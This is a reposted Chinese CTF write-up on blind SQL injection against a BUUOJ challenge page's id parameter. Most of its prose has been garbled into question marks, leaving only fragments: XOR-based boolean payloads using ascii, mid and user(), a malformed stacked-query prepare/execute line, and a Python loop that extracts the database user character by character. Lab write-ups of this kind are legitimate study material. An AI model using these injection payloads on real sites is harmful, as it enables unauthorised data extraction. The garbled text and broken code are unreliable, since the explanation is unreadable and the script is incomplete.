本文共 1744 字,大约阅读时间需要 5 分钟。
????????????????SQL???????????????????????????????????????????????????????????????????????????????????
???????????SQL?????????????????????????????????????????????????????????????????@???union?select????????????
??????????????SQL???
2^(if(ascii(mid(user(),1,1))>0,0,1))
??????????????????????????0??????????????????????0?????0????????1???????????????????????
?????????????????????????????????????????????WordPress?WP????????
?????????????????????????SQL??????????500????????????????????????????????????cookie?????????
??????????????????????????????
? id=2; set @sql = char(12, 324, 23, 23, ); prepare query from @sql; execute query;
?????????????????????SQL???
??????????????????????????????mid???????ascii?????????????????????
???????????WordPress???????????????????????????????????????????
???user.php????????????????id????????????????????
if (ascii(mid(user(),1,1)) > 0, 0, 1)
???????????????????????
?????????????????
1^
??????????????????????????????
??????????????????????????
id???????????if??????????1^????????????????????????Python??????????????????????
for i in range(1,15): for j in range(50,155): url = '''http://77a4fc87-2f45-4e87-b5fe-0ea6cf054bd3.node3.buuoj.cn/user/user.php?id=1^(ascii(mid(user(),{},1))={})'''.format(i,j) cookie = { "PHPSESSID":"514gsk3jr3pf1ubri65d5pr714"} res = requests.get(url=url, cookies=cookie) content = re.findall('.*
', res.text, re.M|re.I) if ("admin" not in content[0]): database += chr(j) break ??????????????????id?username???????????????????
?????????????????????????????????????????????????flag???????????????
?????SQL????????????????????????????????????????????????????????????????
转载地址:http://ykgg.baihongyu.com/